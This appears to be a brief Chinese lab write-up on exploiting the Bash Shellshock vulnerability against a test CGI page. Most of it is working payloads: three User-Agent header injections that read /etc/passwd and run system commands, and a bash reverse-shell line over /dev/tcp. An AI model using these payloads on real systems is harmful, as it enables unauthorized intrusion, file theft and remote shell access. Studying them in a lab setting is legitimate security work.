特征
如图所示
1、网站title是Bash ShellShock
2、victim.cgi
文件
详细说明请看
https://www.cnblogs.com/cute-puli/p/14649873.html
楼主这里只做实验
3个exp
exp1
curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://192.168.100.34:8080/victim.cgi
exp2
User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id
exp3
User-Agent: () { :;};echo;echo $(/bin/ls -al /);/usr/bin/id;
思考
既然可以执行命令,那我们还是反弹一个shell吧
/bin/bash -i >& /dev/tcp/192.168.100.34/4444 0>&1
成功反弹